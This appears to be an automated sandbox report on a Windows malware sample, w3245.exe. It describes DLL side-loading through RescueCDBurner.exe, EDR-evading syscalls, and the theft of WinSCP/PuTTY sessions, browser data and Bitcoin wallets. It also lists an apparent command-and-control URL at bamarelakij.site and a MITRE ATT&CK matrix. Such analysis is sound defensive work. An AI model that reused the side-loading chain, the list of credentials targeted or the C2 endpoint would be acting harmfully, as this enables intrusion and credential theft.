Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts		4
Native API		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		1
OS Credential Dumping		12
System Time Discovery		Remote Services11
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Command and Scripting Interpreter		1
Create Account		11
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
Credentials in Registry		1
Account Discovery		Remote Desktop Protocol11
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Service Execution		2
Valid Accounts		2
Valid Accounts		1
Abuse Elevation Control Mechanism		Security Account Manager1
System Service Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron4
Windows Service		21
Access Token Manipulation		4
Obfuscated Files or Information		NTDS14
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		4
Windows Service		1
Software Packing		LSA Secrets148
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts213
Process Injection		11
DLL Side-Loading		Cached Domain Credentials121
Security Software Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		1
File Deletion		DCSync3
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Masquerading		Proc Filesystem11
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Valid Accounts		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
Virtualization/Sandbox Evasion		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
Access Token Manipulation		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task213
Process Injection		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Indicator Removal		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584991 Sample: w3245.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 76 92 bamarelakij.site 2->92 94 api.msn.com 2->94 112 AI detected suspicious sample 2->112 13 w3245.exe 3 2->13         started        16 RescueCDBurner.exe 1 2->16         started        19 msedge.exe 2->19         started        22 2 other processes 2->22 signatures3 process4 dnsIp5 90 C:\Windows\Temp\...\w3245.exe, PE32 13->90 dropped 24 w3245.exe 17 13->24         started        108 Maps a DLL or memory area into another process 16->108 110 Found direct / indirect Syscall (likely to bypass EDR) 16->110 27 cmd.exe 2 16->27         started        96 192.168.2.4, 138, 443, 49335 unknown unknown 19->96 98 239.255.255.250 unknown Reserved 19->98 30 msedge.exe 19->30         started        33 msedge.exe 19->33         started        35 msedge.exe 19->35         started        41 3 other processes 19->41 37 msedge.exe 22->37         started        39 msedge.exe 22->39         started        file6 signatures7 process8 dnsIp9 72 C:\Windows\Temp\...\RescueCDBurner.exe, PE32 24->72 dropped 74 C:\Windows\Temp\...\msvcr100.dll, PE32 24->74 dropped 76 C:\Windows\Temp\...\msvcp100.dll, PE32 24->76 dropped 80 6 other files (none is malicious) 24->80 dropped 43 RescueCDBurner.exe 11 24->43         started        78 C:\Users\user\AppData\...\eykunyxpxybnsa, PE32+ 27->78 dropped 128 Writes to foreign memory regions 27->128 130 Maps a DLL or memory area into another process 27->130 47 LocalCtrl_alpha_v3.exe 27->47         started        49 conhost.exe 27->49         started        102 18.173.219.113, 443, 50008 MIT-GATEWAYSUS United States 30->102 104 20.110.205.119, 443, 50016 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->104 106 18 other IPs or domains 30->106 file10 signatures11 process12 file13 82 C:\Users\user\AppData\...\RescueCDBurner.exe, PE32 43->82 dropped 84 C:\Users\user\AppData\...\msvcr100.dll, PE32 43->84 dropped 86 C:\Users\user\AppData\...\msvcp100.dll, PE32 43->86 dropped 88 5 other files (none is malicious) 43->88 dropped 138 Switches to a custom stack to bypass stack traces 43->138 140 Found direct / indirect Syscall (likely to bypass EDR) 43->140 51 RescueCDBurner.exe 1 43->51         started        142 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 47->142 144 Tries to harvest and steal browser information (history, passwords, etc) 47->144 signatures14 process15 signatures16 114 Maps a DLL or memory area into another process 51->114 116 Switches to a custom stack to bypass stack traces 51->116 118 Found direct / indirect Syscall (likely to bypass EDR) 51->118 54 cmd.exe 5 51->54         started        process17 file18 68 C:\Users\user\...\LocalCtrl_alpha_v3.exe, PE32+ 54->68 dropped 70 C:\Users\user\AppData\...\hsiywoxwiypiaj, PE32+ 54->70 dropped 120 Writes to foreign memory regions 54->120 122 Found hidden mapped module (file has been removed from disk) 54->122 124 Maps a DLL or memory area into another process 54->124 126 Switches to a custom stack to bypass stack traces 54->126 58 LocalCtrl_alpha_v3.exe 54->58         started        62 conhost.exe 54->62         started        signatures19 process20 dnsIp21 100 bamarelakij.site 104.21.80.52, 443, 49850, 49861 CLOUDFLARENETUS United States 58->100 132 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 58->132 134 Tries to harvest and steal Bitcoin Wallet information 58->134 136 Found direct / indirect Syscall (likely to bypass EDR) 58->136 64 msedge.exe 58->64         started        signatures22 process23 process24 66 msedge.exe 64->66         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
w3245.exe3%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe3%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\Fondue.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtCore4.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtGui4.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtNetwork4.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtXml4.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe3%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\StarBurn.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcp100.dll0%ReversingLabs
C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia0%Avira URL Cloudsafe
https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x0%Avira URL Cloudsafe
http://www.reneelab.biz/0%Avira URL Cloudsafe
http://www.reneelab.cc/0%Avira URL Cloudsafe
http://www.reneelab.it/0%Avira URL Cloudsafe
http://support.reneelab.com/anonymous_requests/new0%Avira URL Cloudsafe
http://www.reneelab.fr/0%Avira URL Cloudsafe
https://downloads.reneelab.com/download_api.php0%Avira URL Cloudsafe
http://bug.reneelab.com0%Avira URL Cloudsafe
https://downloads.reneelab.com.cn/download_api.php0%Avira URL Cloudsafe
http://www.reneelab.ru/0%Avira URL Cloudsafe
http://b.chenall.net/menu.lst0%Avira URL Cloudsafe
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D0%Avira URL Cloudsafe
http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D0%Avira URL Cloudsafe
http://www.reneelab.de/0%Avira URL Cloudsafe
http://www.softwareok.de0%Avira URL Cloudsafe
https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac0%Avira URL Cloudsafe
http://isecure-a.reneelab.com/webapi.php?code=0%Avira URL Cloudsafe
http://grub4dos.chenall.net/e/%u)0%Avira URL Cloudsafe
http://www.reneelab.es/0%Avira URL Cloudsafe
http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
https://www.reneelab.com0%Avira URL Cloudsafe
http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore0%Avira URL Cloudsafe
http://bugreports.qt-project.org/0%Avira URL Cloudsafe
http://www.reneelab.com.cn/0%Avira URL Cloudsafe
http://www.reneelab.pl/0%Avira URL Cloudsafe
http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo0%Avira URL Cloudsafe
http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa0%Avira URL Cloudsafe
https://www.reneelab.comwww.reneelab.comhttp://https://00%Avira URL Cloudsafe
http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User0%Avira URL Cloudsafe
http://www.reneelab.kr/0%Avira URL Cloudsafe
http://www.reneelab.jp/0%Avira URL Cloudsafe
http://isecure.reneelab.com.cn/webapi.php?code=0%Avira URL Cloudsafe
https://downloads.reneelab.com/passnow/passnow_0%Avira URL Cloudsafe
http://www.winimage.com/zLibDll1.2.60%Avira URL Cloudsafe
http://qt.digia.com/product/licensing0%Avira URL Cloudsafe
http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n0%Avira URL Cloudsafe
http://www.???.xx/?search=%s0%Avira URL Cloudsafe
http://www.reneelab.net/0%Avira URL Cloudsafe
https://ntp.msn.comreport-to:0%Avira URL Cloudsafe
http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html0%Avira URL Cloudsafe
http://isecure.reneelab.com/webapi.php?code=0%Avira URL Cloudsafe
http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://0%Avira URL Cloudsafe
http://www.reneelab.com/0%Avira URL Cloudsafe
http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst0%Avira URL Cloudsafe
http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()0%Avira URL Cloudsafe
http://www.surfok.de/0%Avira URL Cloudsafe
https://downloads.reneelab.com.cn/passnow/passnow_0%Avira URL Cloudsafe
http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony0%Avira URL Cloudsafe
http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high
    sb.scorecardresearch.com
    		18.244.18.27
    		truefalse
      		high
      s-part-0017.t-0009.t-msedge.net
      		13.107.246.45
      		truefalse
        		high
        googlehosted.l.googleusercontent.com
        		142.250.185.65
        		truefalse
          		high
          bamarelakij.site
          		104.21.80.52
          		truefalse
            		unknown
            clients2.googleusercontent.com
            		unknown
            		unknownfalse
              		high
              bzib.nelreports.net
              		unknown
              		unknownfalse
                		high
                assets.msn.com
                		unknown
                		unknownfalse
                  		high
                  c.msn.com
                  		unknown
                  		unknownfalse
                    		high
                    ntp.msn.com
                    		unknown
                    		unknownfalse
                      		high
                      api.msn.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887865&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                          		high
                          https://deff.nelreports.net/api/report?cat=msnfalse
                            		high
                            https://c.msn.com/c.gif?rnd=1736201884774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=21dedbcc40f24d988b676b18e5a4d184&activityId=21dedbcc40f24d988b676b18e5a4d184&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=09177A4F17534286BB4134B207DC161D&MUID=1B715D3435BD60832FC8485834156189false
                              		high
                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888101&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                		high
                                https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3Dfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://sb.scorecardresearch.com/b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                  		high
                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201884773&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                    		high
                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887861&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                      		high
                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888863&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                        		high
                                        https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
                                          		high
                                          https://chrome.cloudflare-dns.com/dns-queryfalse
                                            		high
                                            https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                              		high
                                              https://sb.scorecardresearch.com/b?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_xRescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.vmware.com/0RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://msn.comLocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItaliaRescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://support.reneelab.com/anonymous_requests/newRescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.reneelab.fr/RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://downloads.reneelab.com.cn/download_api.phpRescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.reneelab.it/RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://xml.org/sax/features/namespace-prefixesRescueCDBurner.exe, 00000002.00000002.1748933736.000000006C159000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1807317084.000000006B539000.00000002.00000001.01000000.00000014.sdmpfalse
                                                      		high
                                                      https://ntp.msn.comLocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.reneelab.biz/RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://downloads.reneelab.com/download_api.phpRescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://bug.reneelab.comRescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.reneelab.cc/RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://qt.digia.com/RescueCDBurner.exe, 00000003.00000002.1806872919.000000006B12E000.00000002.00000001.01000000.00000017.sdmpfalse
                                                          		high
                                                          http://www.reneelab.ru/RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.reneelab.de/RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
